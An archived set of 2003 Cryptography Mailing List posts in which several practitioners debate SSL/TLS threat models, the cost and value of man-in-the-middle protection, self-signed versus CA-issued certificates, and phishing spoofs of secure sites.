It is one thing to argue that a bridge does not need another million
dollars worth of steel, but who can rationally argue that we should
use different, less secure algorithms when there is no obvious
benefit, either in computation, in development costs or in license
fees (since TLS is after all free of any such fees), and the
alternatives are less secure? In such a light, a cost/benefit analysis
leads inexorably to Use TLS -- second best saves nothing and might
cost a lot in lower security.

Some of your arguments seem to come down to there wasn't enough
thought given to the threat model. That might have been true when the
SSL/TLS process began, but a bunch of fairly smart people worked on
it, and we've ended up with a pretty solid protocol that is at worst
more secure than you might absolutely need but which covers the threat
model in most of the cases in which it might be used. You've yet to
argue that the threat model is insufficiently secure -- only that it
might be more than one needs -- so what is the harm?

Honestly the only really good argument against TLS I can think of is
that if one wants to use something like SSH keying instead of X.509
keying the detailed protocol doesn't support it very well, but the
protocol can be trivially adapted to do what one wants and the
underlying security model is almost exactly what one wants in a
majority of cases. Such an adaptation might be a fine idea, but it can
be done without giving up any of the fine analysis that went into TLS.

Actually, there is one other argument against TLS -- it does not
protect underlying TCP signaling the way that IPSec does. However,
given where it sits in the stack, you can't fault it for that.

 I think the failure of client certs has the same
 root cause as the failure of SSL/TLS to branch
 beyond its mandated role of protecting e-
 commerce.  Literally, the requirement that
 the cert be supplied (signed) by a third party
 killed it dead.  If there had been a button on
 every browser that said generate self-signed
 client cert now then the whole world would be
 using them.

This is not a failure of TLS. This is a failure of the browsers and
web servers. There is no reason browsers couldn't do exactly that,
tomorrow, and that sites couldn't operate on an SSH accept only what
you saw the first time model. TLS is fully capable of supporting that.

If you want to argue against X.509, that might be a fine and quite
reasonable argument. I would happily argue against lots of X.509
myself. However, X.509 is not TLS, and TLS's properties are not those
of X.509.

-- 
Perry E. Metzger[EMAIL PROTECTED]

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Thor Lancelot Simon
On Wed, Oct 22, 2003 at 05:08:32PM -0400, Tom Otvos wrote:
 
  So what purpose would client certificates address? Almost all of the use
  of SSL domain name certs is to hide a credit card number when a consumer
  is buying something. There is no requirement for the merchant to
  identify and/or authenticate the client  the payment infrastructure
  authenticates the financial transaction and the server is concerned
  primarily with getting paid (which comes from the financial institution)
  not who the client is.
 
 
 The CC number is clearly not hidden if there is a MITM.

Can you please posit an *exact* situation in which a man-in-the-middle
could steal the client's credit card number even in the presence of a
valid server certificate?  Can you please explain *exactly* how using a
client-side certificate rather than some other form of client authentication
would prevent this?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Perry E. Metzger

[EMAIL PROTECTED] (David Wagner) writes:
 Tom Otvos wrote:
 As far as I can glean, the general consensus in WYTM is that MITM
 attacks are very low (read:
 inconsequential) probability.  Is this *really* true?
 
 I'm not aware of any such consensus.

I will state that MITM attacks are hardly a myth. They're used by
serious attackers when the underlying protocols permit it, and I've
witnessed them in the field with my own two eyes. Hell, they're even
well enough standardized that I've seen them in use on conference
networks. Some such attacks have been infamous.

MITM attacks are not currently the primary means for stealing credit
card numbers these days both because TLS makes it harder to do MITM
attacks and thus it is usually easier just to break in to the poorly
defended web server and steal the card numbers directly. However, that
is not a reason to remove anti-MITM defenses from TLS -- it is in fact
a reason to think of them as a success.

 I suspect you'd get plenty of debate on this point.
 But in any case, widespread exploitation of a vulnerability
 shouldn't be a prerequisite to deploying countermeasures.

Indeed. Imagine if we waited until airplanes exploded regularly to
design them so they would not explode, or if we had designed our first
suspension bridges by putting up some randomly selected amount of
cabling and seeing if the bridge collapsed. That's not how good
engineering works.

 If we see a plausible future threat and the stakes are high enough,
 it is often prudent to deploy defenses in advance against the
 possibility that attackers.

This is especially true when the marginal cost of the defenses is near
zero. The design cost of the countermeasures was high, but once
designed they can be replicated with no greater expense than that of
any other protocol.

 It's hard to predict with confidence which of the many
 vulnerabilities will be popular among attackers five years from now,
 and I've been very wrong, in both directions, many times.  In
 recognition of our own fallibility at predicting the future, the
 conclusion I draw is that it is a good idea to be conservative.

Ditto.

-- 
Perry E. Metzger[EMAIL PROTECTED]

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Ian Grigg
Tom Weinstein wrote:
 
 Ian Grigg wrote:
 
  Nobody doubts that it can occur, and that it *can* occur in practice.
  It is whether it *does* occur that is where the problem lies.
 
 This sort of statement bothers me.
 
 In threat analysis, you have to base your assessment on capabilities,
 not intentions. If an attack is possible, then you must guard against
 it. It doesn't matter if you think potential attackers don't intend to
 attack you that way, because you really don't know if that's true or not
 and they can always change their minds without telling you.

In threat analysis, you base your assessment on
economics of what is reasonable to protect.  It
is perfectly valid to decline to protect against
a possible threat, if the cost thereof is too high,
as compared against the benefits.

This is the reason that we cannot simply accept
the possible as a basis for engineering of any
form, let alone cryptography.  And this is the
reason why, if we can't measure it, then we are
probably justified in assuming it's not a threat
we need to worry about.

(Of course, anecdotal evidence helps in that
respect, hence there is a lot of discussion
about MITMs in other forums.)

iang

Here's Eric Rescorla's words on this:

http://www.iang.org/ssl/rescorla_1.html

The first thing that we need to do is define our ithreat model./i
A threat model describes resources we expect the attacker to
have available and what attacks the attacker can be expected
to mount.  Nearly every security system is vulnerable to some
threat or another.  To see this, imagine that you keep your
papers in a completely unbreakable safe.  That's all well and
good, but if someone has planted a video camera in your office
they can see your confidential information whenever you take it
out to use it, so the safe hasn't bought you that much.

Therefore, when we define a threat model, we're concerned
not only with defining what attacks we are going to worry
about but also those we're not going to worry about.
Failure to take this important step typically leads to
complete deadlock as designers try to figure out how to
counter every possible threat.  What's important is to
figure out which threats are realistic and which ones we
can hope to counter with the tools available.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Perry E. Metzger

Ian Grigg [EMAIL PROTECTED] writes:
 In threat analysis, you base your assessment on
 economics of what is reasonable to protect.  It
 is perfectly valid to decline to protect against
 a possible threat, if the cost thereof is too high,
 as compared against the benefits.

The cost of MITM protection is, in practice, zero. Indeed, if you
wanted to produce an alternative to TLS without MITM protection, you
would have to spend lots of time and money crafting and evaluating a
new protocol that is still reasonably secure without that
protection. One might therefore call the cost of using TLS, which may
be used for free, to be substantially lower than that of an
alternative.

How low does the risk have to get before you will be willing not just
to pay NOT to protect against it? Because that is, in practice, what
you would have to do. You would actually have to burn money to get
lower protection. The cost burden is on doing less, not on doing
more.

There is, of course, also the cost of what happens when someone MITM's
you.

You keep claiming we have to do a cost benefit analysis, but what is
the actual measurable financial benefit of paying more for less
protection?

Perry

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


RE: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Anne Lynn Wheeler
At 05:42 PM 10/22/2003 -0400, Tom Otvos wrote:

Absolutely true.  If the only effect of a MITM is loss of privacy, then 
that is certainly a
lower-priority item to fix than some quick cash scheme.  So the threat 
model needs to clearly
define who the bad guys are, and what their motivations are.  But then 
again, if I am the victim of
a MITM attack, even if the bad guy did not financially gain directly from 
the attack (as in, getting
my money or something for free), I would consider loss of privacy a 
significant thing. What if an
attacker were paid by someone (indirect financial gain) to ruin me by 
buying a bunch of stock on
margin?  Maybe not the best example, but you get the idea.  It is not an 
attack that affects
millions of people, but to the person involved, it is pretty 
serious.  Shouldn't the server in
this case help mitigate this type of attack?


ok, the original SSL domain name certificate for what became electronic 
commerce was

1) am I really talking to the server that I think I'm talking to
2) encrypted session.
so the attack in #1 was plausably some impersonation ... either MITM or 
straight impersonation. The issue was that there was a perceived 
vulnerability in the domain name infrastructure that somebody could 
contaminate the domain name look up and get the ip-address for the client 
redirected to the impersonater.

The SSL domain name certificates carry the original domain name  the 
client validates the domain name certificate with one of the public keys in 
the browser CA table ... and then validates that the server that it is 
communicating with can sign/encrypt something with the private key that 
corresponds to the public key carried in the certificate ... and then the 
client compares the domain name in the certificate with the URL that the 
browser used.  In theory, if all of that works  then it is highly 
unlikely that the client is talking to the wrong ip-address (since it 
should be the ip-address of the server that corresponds to the server).

So what are the subsequent problems:

1) the original idea was that the whole shopping experience was protected 
by the SSL domain name certificate  preventing MITM  impersonation 
attacks. However, it was found that SSL overhead was way to expensive and 
so the servers dropped back to just using it for encryption of the shopping 
experience. This means that the client ... does all their shopping ... with 
the real server or the imposter ... and then clicks on a button to check 
out that drops the client into SSL for the credit card number. The problem 
is that if it is an imposter ... the button likely carries a URL for which 
the imposter has a valid certificate for.

or

2) the original concern was possible ip-address hijacking in the domain 
name infrastructure  so the correct domain name maps to the wrong ip 
address  and the client goes to an imposter (whether or not the 
imposter needs to do an actual MITM or not). The problem is that when 
somebody approaches a CA for a certificate  the CA has to contact the 
domain name system as to the true owner of the domain name. It turns out 
that integrity issues in the domain name infrastructure not only can result 
in ip-address take-over  but also domain name take-over. The imposter 
exploits integrity flaws in the domain name infrastructure and does a 
domain name take-over  approaches a CA for a SSL domain name 
certificate ... and the CA issues it ... because the domain name 
infrastructure claims it is the true owner.

So somewhat from the CA industry ... there is a proposal that people 
register a public key in the domain name database when they obtain a domain 
name. After that ... all communication is digitally signed and validated 
with the database entry public key (notice this is certificate-less). This 
has the attribute of improving the integrity of the domain name 
infrastructure ... so the CA industry can trust the domain name 
infrastructure integrity so the rest of the world can trust the SSL comain 
name certificates?

This has the opportunity for simplifying the  SSL domain name certificate 
requesting process. The entity requesting the SSL domain name certificate 
 digitally signs the request (certificate-less of course). The CA 
validates the SSL domain name certificate request by retrieving the valid 
owner's public key from the domain name infrastructure database to 
authenticate the request. This is a lot more efficient and has less 
vulnerabilities than the current infrastructure.

The current infrastructure has some identification of the domain name owner 
recorded in the domain name infrastructure database. When an entity 
requests a SSL domain name certificate ... they provide additional 
identification to the CA. The CA now has to retrieve the information from 
the domain name infrastructure database and map it to some real world 
identification. They then have to take the requester's information and also 
map it to 

Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Tom Weinstein
Ian Grigg wrote:

Tom Weinstein wrote:
 

In threat analysis, you have to base your assessment on capabilities,
not intentions. If an attack is possible, then you must guard against
it. It doesn't matter if you think potential attackers don't intend to
attack you that way, because you really don't know if that's true or not
and they can always change their minds without telling you.
   

In threat analysis, you base your assessment on
economics of what is reasonable to protect.  It
is perfectly valid to decline to protect against
a possible threat, if the cost thereof is too high,
as compared against the benefits.
This is the reason that we cannot simply accept
the possible as a basis for engineering of any
form, let alone cryptography.  And this is the
reason why, if we can't measure it, then we are
probably justified in assuming it's not a threat
we need to worry about.
The economic view might be a reasonable view for an end-user to take, 
but it's not a good one for a protocol designer. The protocol designer 
doesn't have an economic model for how end-users will end up using the 
protocol, and it's dangerous to assume one. This is especially true for 
a protocol like TLS that is intended to be used as a general solution 
for a wide range of applications.

In some ways, I think this is something that all standards face. For any 
particular application, the standard might be less cost effective than a 
custom solution. But it's much cheaper to design something once that 
works for everyone off the shelf than it would be to custom design a new 
one each and every time.

--
Give a man a fire and he's warm for a day, but set   | Tom Weinstein
him on fire and he's warm for the rest of his life.  | [EMAIL PROTECTED] 

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Ian Grigg
Perry E. Metzger wrote:
 
 Ian Grigg [EMAIL PROTECTED] writes:
  In threat analysis, you base your assessment on
  economics of what is reasonable to protect.  It
  is perfectly valid to decline to protect against
  a possible threat, if the cost thereof is too high,
  as compared against the benefits.
 
 The cost of MITM protection is, in practice, zero.


Not true!  The cost is from 10 million dollars to
100 million dollars per annum.  Those certs cost
money, Perry!  All that sysadmin time costs money,
too!  And all that managerial time trying to figure
out why the servers don't just work.  All those
consultants that come in and look after all those
secure servers and secure key storage and all that.

In fact, it costs so much money that nobody bothers
to do it *unless* they are forced to do it by people
telling them that they are being irresponsibly
vulnerable to the MITM!  Whatever that means.

Literally, nobody - 1% of everyone - runs an SSL
server, and even only a quarter of those do it
properly.  Which should be indisputable evidence
that there is huge resistance to spending money
on MITM.


 Indeed, if you
 wanted to produce an alternative to TLS without MITM protection, you
 would have to spend lots of time and money crafting and evaluating a
 new protocol that is still reasonably secure without that
 protection. One might therefore call the cost of using TLS, which may
 be used for free, to be substantially lower than that of an
 alternative.


I'm not sure how you come to that conclusion.  Simply
use TLS with self-signed certs.  Save the cost of the
cert, and save the cost of the re-evaluation.

If we could do that on a widespread basis, then it
would be worth going to the next step, which is caching
the self-signed certs, and we'd get our MITM protection
back!  Albeit with a bootstrap weakness, but at real
zero cost.

Any merchant who wants more, well, there *will* be
ten offers in his mailbox to upgrade the self-signed
cert to a better one.  Vendors of certs may not be
the smartest cookies in the jar, but they aren't so
dumb that they'll miss the financial benefit of self-
signed certs once it's been explained to them.

(If you mean, use TLS without certs - yes, I agree,
that's a no-won.)


 How low does the risk have to get before you will be willing not just
 to pay NOT to protect against it? Because that is, in practice, what
 you would have to do. You would actually have to burn money to get
 lower protection. The cost burden is on doing less, not on doing
 more.


This is a well known metric.  Half is a good rule of
thumb.  People will happily spend X to protect themselves
from X/2.  Not all the people all the time, but it's
enough to make a business model out of.  So if you
were able to show that certs protected us from 5-50
million dollars of damage every year, then you'd be
there.

(Mind you, where you would be is, proposing that certs
would be good to make available.  Not compulsory for
applications.)


 There is, of course, also the cost of what happens when someone MITM's
 you.


So I should spend the money.  Sure.  My choice.


 You keep claiming we have to do a cost benefit analysis, but what is
 the actual measurable financial benefit of paying more for less
 protection?


Can you take that to the specific case?

iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL, client certs, and MITM (was WYTM?)

2003-10-22 Thread Perry E. Metzger

Ian Grigg [EMAIL PROTECTED] writes:
 Perry E. Metzger wrote:
  The cost of MITM protection is, in practice, zero.
 
 Not true!  The cost is from 10 million dollars to
 100 million dollars per annum.  Those certs cost
 money, Perry!

They cost nothing at all. I use certs every day that I've created in
my own CA to provide MITM protection, and I paid no one for them. It
isn't even hard to do.

Repeat after me:
TLS is not only for protecting HTTP, and should not be mistaken for https:.
TLS is not X.509, and should not be mistaken for X.509.
TLS is also not buy a cert from Verisign, and should not be
mistaken for buy a cert from Verisign.

TLS is just a pretty straightforward well analyzed protocol for
protecting a channel -- full stop. It can be used in a wide variety of
ways, for a wide variety of apps. It happens to allow you to use X.509
certs, but if you really hate X.509, define an extension to use SPKI
or SSH style certs. TLS will accommodate such a thing easily. Indeed, I
would encourage you to do such a thing.

Perry

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-21 Thread Werner Koch
On Tue, 21 Oct 2003 15:02:14 +1300, Peter Gutmann said:

 Are there any known servers online that offer X.509 (or PGP) mechanisms in
 their handshake?  Both ssh.com and VanDyke are commercial offerings so it's
 not possible to look at the source code to see what they do, and I'm not sure

Joel N. Weber II developed PGP patches for OpenSSH:

http://www.red-bean.com/~nemo/openssh-gpg/

and I am pretty sure that he has a server up somewhere. 


  Werner

-- 
Werner Koch  [EMAIL PROTECTED]
The GnuPG Expertshttp://g10code.com
Free Software Foundation Europe  http://fsfeurope.org

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-20 Thread Peter Gutmann
Thor Lancelot Simon [EMAIL PROTECTED] writes:

I believe the VanDyke implementation also supports X.509, and interoperates
with the ssh.com code.  It was also my perception that, at the time, the
VanDyke guy was basically shouted down when trying to discuss the utility of
X.509 for this purpose and put his marbles back in his cloth sack and went
home.

Are there any known servers online that offer X.509 (or PGP) mechanisms in
their handshake?  Both ssh.com and VanDyke are commercial offerings so it's
not possible to look at the source code to see what they do, and I'm not sure
that I want to run the gauntlet of getting some sample copy of a commercial
app (if they're available) and figuring out how to set it up to work with
certs just to see what the data format is supposed to be...

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-19 Thread Damien Miller
On Sun, 2003-10-19 at 00:47, Peter Gutmann wrote:

 What was the motive for adding lip service into the document?
 
 So that it's possible to claim PGP and X.509 support if anyone's interested in
 it.  It's (I guess) something driven mostly by marketing so you can answer
 Yes to any question of Do you support x.  You can find quite a number of
 these things present in various security specs, it's not just an SSH thing.

I think that you are misrepresenting the problem a little. At 
least one vendor (ssh.com) has a product that supports both X.509 
and PGP, so the inclusion of these in the I-D is not just marketing 
overriding reality - just a lack of will on part of the the draft's
authors. 

I have seen little involvement on the secsh wg mailing list by 
the ssh.com people since the public spat about trademark rights 
over ssh a few years back. Since noone else implements these two 
public key methods, the work has never been done. IIRC The wg 
decided to punt the issue to a separate draft if it ever arose
again. It hasn't in two years. 

In the meantime, everyone involved seems to have become deathly 
afraid of touching the draft so as not to impede its glacial 
progress through the IETF on its way to RFC-hood.

Whether a sizeable number of customers acutally use certificates 
for ssh is another matter. IMO The only real use for certs in ssh 
is the issue of initial server authentication. 

If one wants to use certificates to facilitate this process, they 
can already - just publish the server keys on a https server 
somewhere and/or sign them with PGP :)

-d


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-18 Thread Peter Gutmann
Damien Miller [EMAIL PROTECTED] writes:

The SSH protocol supports certificates (X.509 and OpenPGP), though most
implementations don't.

One of the reason why many implementations may not support it is that the spec
is completely ambiguous as to the data formats being used.  For example it
specifies the signature blob format as an X.509 signature, which could be
about half a dozen different things.  Same with PGP signatures, for which
there's even more possibilities.  In addition since almost nothing implements
them, it's not possible to get test data from someone else's server to see
what they're doing (hmm, and even if there was there's no way to tell whether
their interpretation would match someone else's).

Peter.

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-17 Thread John S. Denker
On 10/16/2003 07:19 PM, David Honig wrote:

 it would make sense for the original vendor website (eg Palm)
 to have signed the MITM site's cert (palmorder.modusmedia.com),
 not for Verisign to do so.  Even better, for Mastercard to have signed
 both Palm and palmorder.modusmedia.com as well.  And Mastercard to
 have printed its key's signature in my monthly paper bill.
Bravo.  Those are golden words.

Let me add my few coppers:

1) This makes contact with a previous thread wherein
the point was made that people often unwisely talk
about identities when they should be talking about
credentials aka capabilities.
I really don't care about the identity of the
order-taking agent (e.g. palmorder.modusmedia.com).
What I want to do is establish the *credentials*
of this *session*.  I want a session with the
certified capability to bind palm.com to a
contract, and the certified capability to handle
my credit-card details properly.
2) We see that threat models (as mentioned
in the Subject: line of this thread), while
an absolutely vital part of the story, are
not the whole story.  One always needs a
push-pull approach, documenting the good
things that are supposed to happen *and* the
bad things that are supposed to not happen
(i.e. threats).
3) To the extent that SSL focuses on IDs rather
than capabilities, IMHO the underlying model has
room for improvement.
4a) This raises some user-interface issues.  The
typical user is not a world-class cryptographer
and may not have a clear idea just what ensemble
of credentials a given session ought to have.
This is not a criticism of credentials;  the user
doesn't know what ID the session ought to have
under the current system, as illustrated by the
Palm example.  The point is that if we want
something better than what we have now, we have
a lot of work to do.
4b) As a half-baked thought:  One informal intuitive
notion that users have is that if a session displays
the MasterCard *logo* it must be authorized by
MasterCard.  This notion is enforceable by law
in the long run.  Can we make it enforceable
cryptographically in real time?  Perhaps the CAs
should pay attention not so much to signing domain
names (with some supposed responsibility to refrain
from signing abusively misspelled names e.g.
pa1m.com) but rather more to signing logos (with
some responsibility to not sign bogus ones).
Then the browser (or other user interface) should
to verify -- automatically -- that a session that
wishes to display certain logos can prove that
it is authorized to do so.  If the logos check
out, they should be displayed in some distinctive
way so that a cheap facsimile of a logo won't be
mistaken for a cryptologically verified logo.
Even if you don't like my half-baked proposal (4b)
I hope we can all agree that the current ID-based
system has room for improvement.
=

Tangentially-related point about credentials:

In a previous thread the point was made that
anonymous or pseudonymous credentials can only
say positive things.  That is, I cannot discredit
you by giving you a discredential.  You'll just
throw it away.  If I somehow discredit your
pseudonym, you'll just choose another and start
over.
This problem can be alleviated to some extent
if you can post a fiduciary bond.  Then if you
do something bad, I can demand compensation from
the agency that issued your bond.  If this
happens a lot, they may revoke your bond.  That
is, you can be discredited by losing a credential.
This means I can do business with you without
knowing your name or how to find you.  I just
need to trust the agency that issued your bond.
The agency presumably needs to know a lot about
you, but I don't.
-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-17 Thread Anne Lynn Wheeler
On Fri, 2003-10-17 at 00:58, John S. Denker wrote:
 Tangentially-related point about credentials:
 
 In a previous thread the point was made that
 anonymous or pseudonymous credentials can only
 say positive things.  That is, I cannot discredit
 you by giving you a discredential.  You'll just
 throw it away.  If I somehow discredit your
 pseudonym, you'll just choose another and start
 over.
 
 This problem can be alleviated to some extent
 if you can post a fiduciary bond.  Then if you
 do something bad, I can demand compensation from
 the agency that issued your bond.  If this
 happens a lot, they may revoke your bond.  That
 is, you can be discredited by losing a credential.
 
 This means I can do business with you without
 knowing your name or how to find you.  I just
 need to trust the agency that issued your bond.
 The agency presumably needs to know a lot about
 you, but I don't.

One can claim this is what a credit card does for the consumer  the
name on the card is somewhat tangential to it being a credential; it is
there so that the merchant can authenticate the credential by cross
checking the name on the card with names on other credentials that you
might be carrying. If you have enuf credentials with the same name ...
then it eventually satisfies the merchant that it is your credential.

Some number of places are taking the name off the card  as part of
improving consumer privacy at point-of-sale. They can do this with debit
 where the PIN is a substitution for otherwise proving it is your
credential. however, as previously posted there is a lot of skimming
going an with the information for making a counterfeit card as well as
skarfing up the corresponding PIN is being done.

This is also being done with some kinds of chip cards  where a PIN
is involved  but since the infrastructure trusts the cards 
the counterfeit cards are programmed to accept any PIN  see the yes
card at the bottom of the following URL.
http://www.smartcard.co.uk/resources/articles/cartes2002.html
The issue is that technique used to skim static data for making
counterfeit magstripe cards also applies to skimming static data for
making counterfeit yes cards.

The claim in X9.59 is that the signature from something like an asuretee
card ... can both demonstrate two (or three) factor authentication as
well as proving that the transaction hasn't been tampered with since it
was signed.

In this case, while the card may still look like an (offline) credential
from pre-1970s (with printed credential revokation lists mailled out
every month to all merchants)  it, in fact does an online
transaction. The digital signature proving 2/3 factor authenticaiton
(and no transaction tampering during transit) is then accepted (or not)
by the financial institution which reports back real-time result to the
relying party (merchant).

This is a move from the ancient offline paradigm that has been going on
for hundreds of years (with credentials as substitute for real-time
interaction) to an online paradigm. While the form-factor may still
appear the same as the rapidly becoming obsolete offline credential; it
is actually operating as a long-distance 2/3 factor authentication
mechanism between the consumer and their financial institution  with
the merchant/relying-party getting back a real-time response as to
whether the institution stands behind the request. 

The difference between the x9.59/asuretee implementation and the yes
card implementation is that there is no static data to skim (and use
for creating counterfeit cards/transactions).

misc. x9.59 refs:
http://www.garlic.com/~lynn/index.html#x959

misc. aads chip strawman  asuretee refs:
http://www.garlic.com/~lynn/index.html#aads


The integrity of the chipcard and the integrity of the digital signature
substitutes for requiring the merchants to cross-check the name on the
card with the names on an arbitrary number of other credentials until
they are comfortable performing the transaction. 

The current (non-PIN card) infrastructure is sort of half way between
the old style everything is a credential and the new everything is
online  to a fully trusted online infrastructure. The magstripe
does an online transaction and the institution will approve the
transactions with some number of caveats regarding it not being a
counterfeit/fraudulent transaction. For the non-PIN transactions, the
merchant (can) uses the name on the card to cross check with as many
other credential names until the merchant becomes comfortable.

This is similar to the scenario with the existing SSL domain name
certificate issuing process (using names mapping to common/real-world
identities in order to achieve authentication). The domain name system
registers the owner's name. The CA SSL certificate issuer obtains a name
of the certificate requester  and then the CA attempts to map the
two names into the same real world identities as a means of achieving
authentication. The 

Re: WYTM?

2003-10-16 Thread Ian Grigg
Jon Snader wrote:
 
 On Mon, Oct 13, 2003 at 06:49:30PM -0400, Ian Grigg wrote:
  Yet others say to be sure we are talking
  to the merchant.  Sorry, that's not a good
  answer either because in my email box today
  there are about 10 different attacks on the
  secure sites that I care about.  And mostly,
  they don't care about ... certs.  But they
  care enough to keep doing it.  Why is that?
 
 
 I don't understand this.  Let's suppose, for the
 sake of argument, that MitM is impossible.  It's
 still trivially easy to make a fake site and harvest
 sensitive information.


Yes.  This is the attack that is going on.  This
is today's threat.  (In that it is a new threat.
The old threat still exists - hack the node.)


 If we assume (perhaps erroneously)
 that all but the most naive user will check that they
 are talking to a ``secure site'' before they type in
 that credit card number, doesn't the cert provide assurance
 that you're talking to whom you think you are?


Nope.  It would seem that only the more sophisticated
users can be relied upon to correctly check that they
are at the correct secure site.  In practice almost
all of these attacks bypass any cert altogether and
do not use an SSL protected HTTPS site.

They use a variety of techniques to distract the
attention of the user, some highly imaginative.

For example, if you target the right browser, then it
is possible to popup a box that covers the appropriate
parts.  Or to put a display inside the window that
duplicates the browser display.  Or the URL is one
of those with strange features in there or funny
letters that look like something else.

In practice, these attacks are all statistical,
they look close enough, and the fool some of the
people some of the time.

Finally, just in the last month, they have also
started doing actual cert spoofs.  This was quite
exciting to me to see a spoof site using a cert,
so I went in and followed it.  Hey presto, it
showed me the cert, as it said it was wrong!  So
I clicked on the links and tried to see what was
wrong.

Here's the interesting thing:  I couldn't easily
tell, and my first diagnosis was wrong.  So then
I realised that *even* if the spoof is using a
cert, the victim falls to a confusion attack (see
Tom Weinstein's comments on bad GUIs).

(But, for the most part, 95% or so ignore the cert,
and the user may or may not notice.)

Now, we have no statistics on how many of these
attacks work, other than the following:  they keep
happening, and with increasing frequency over time.

From this I conclude they are working, enough to
justify the cost of the attack at least.

I guess the best thing to say is that the raw
claim that the cert ensures that you are talking
to the merchant is not 100% true.  It will help
a sophisticated user.  An attack will bypass some
of the users a lot.  It might fool many of the
users only occasionally.


 If the argument is that Verisign and the others don't do
 enough checking before issuing the cert, I don't see
 how that somehow means that SSL is flawed.


SSL isn't flawed, per se.  It's just not appropriately
being used in the secure browser application.  It's
fair to say that its use is misaligned to requirements,
and a lot of things could be done to improve matters.

But, one of the perceptions that exist in the browser
world is that SSL secures ecommerce.  Until that view
is rectified, we can't really build the consensus to
have efforts like Ye  Smith, and Close, and others,
be treated as serious and desirable.

(In practice, I don't think it matters how Verisign
and others check the cert.  This is shown by the
fact that almost all of these attacks have bypassed
the cert altogether.)

iang

http://www.iang.org/ssl/maginot_web.html

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-16 Thread Bryce O'Whielacronx

Hopefully everyone realizes this, but just for the record, I didn't write the 
lines apparently attributed to me below -- I was quoting Bruce Schneier.

By the way, I strongly agree with David Honig's point that the wrong entities 
are doing the signing.

Regards,

Bryce O'Whielacronx

 David Honig [EMAIL PROTECTED] wrote:

 At 01:51 PM 10/16/03 -0400, Bryce O'Whielacronx wrote:
   I doubt it.  It's true that VeriSign has certified this
 man-in-the-middle
attack, but no one cares.  
 
 Indeed, it would make sense for the original vendor website (eg Palm)
 to have signed the MITM site's cert (palmorder.modusmedia.com),
 not for Verisign to do so.  Even better, for Mastercard to have signed
 both Palm and palmorder.modusmedia.com as well.  And Mastercard to
 have printed its key's signature in my monthly paper bill.
 
 
 (This is aside your main point about it being Mastercard et al. 
 doing the checking/backup for the customer, not certs.)
 
 
 
 
 

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-15 Thread Ian Grigg
Eric Rescorla wrote:
 
 Ian Grigg [EMAIL PROTECTED] writes:
  I'm sorry, but, yes, I do find great difficulty
  in not dismissing it.  Indeed being other than
  dismissive about it!
 
  Cryptography is a special product, it may
  appear to be working, but that isn't really
  good enough.  Coincidence would lead us to
  believe that clear text or ROT13 were good
  enough, in the absence of any attackers.
 
  For this reason, we have a process.  If the
  process is not followed, then coincidence
  doesn't help to save our bacon.

 Disagree. Once again, SSL meets the consensus threat
 model. It was designed that way partly unconsciously,
 partly due to inertia, and partly due to bullying by
 people who did have the consensus threat model in mind.


(If you mean that the ITM is consenus, I grant
you that two less successful protocols follow
it - S/MIME and IPSec (partly) but I don't
think that makes it consensus.  I know there
are a lot of people who don't think in any other
terms than this model, and that is the issue!
There are also a lot of people who think in
terms completely opposed to ITM.

So to say that ITM is consensus is something
that is going to have to be established.

If that's not what you mean, can you please
define?)


 That's not the design process I would have liked,
 but it's silly to say that a protocol that matches
 the threat model is somehow automatically the wrong
 thing just because the designers weren't as conscious
 as one would have liked.


I'm not sure I ever said that the protocol
doesn't match the threat model - did I?  What
I should have said and hoped to say was that
the protocol doesn't match the application.

I don't think I said automatically, either.
I did hold out hope in that rant of mine that
the designers could have accidentally got it
right.  But, they didn't.

Now, SSL, by itself, within the bounds of the
ITM is actually probably pretty good.  By all
reports, if you want ITM, then SSL is your
best choice.

But, we have to be very careful to understand
that any protocol has a given set of characteristics,
and its applicability to an application is an
uncertain thing;  hence the process of the threat
model and the security model.  In SSL's case, one
needs to say use SSL, but only if your threat
model is close to ITM.  Or similar.  Hence the
title of this rant.

The error of the past has been that too many
people have said something like Use SSL, because
we already got it right.  Which, unfortunately,
skips the whole issue of what threat model one
is dealing with.  Just like happened with secure
browsing.

In this case, the ITM was a) agreed upon after
the fact to fill in the hole, and b) not the right
one for the application.


   And on the client side the user can, of course, click ok to the do
   you want to accept this cert dialog. Really, Ian, I don't understand
   what it is you want to do. Is all you're asking for to have that
   dialog worded differently?
 
 
  There should be no dialogue at all.  Going from
  HTTP to HTTPS/self signed is a mammoth increase
  in security.  Why does the browser say it is
  less/not secure?
 Because it's giving you a chance to accept the certificate,
 and letting you know in case you expected a real cert that
 you're not getting one.


My interpretation - which you won't like - is that
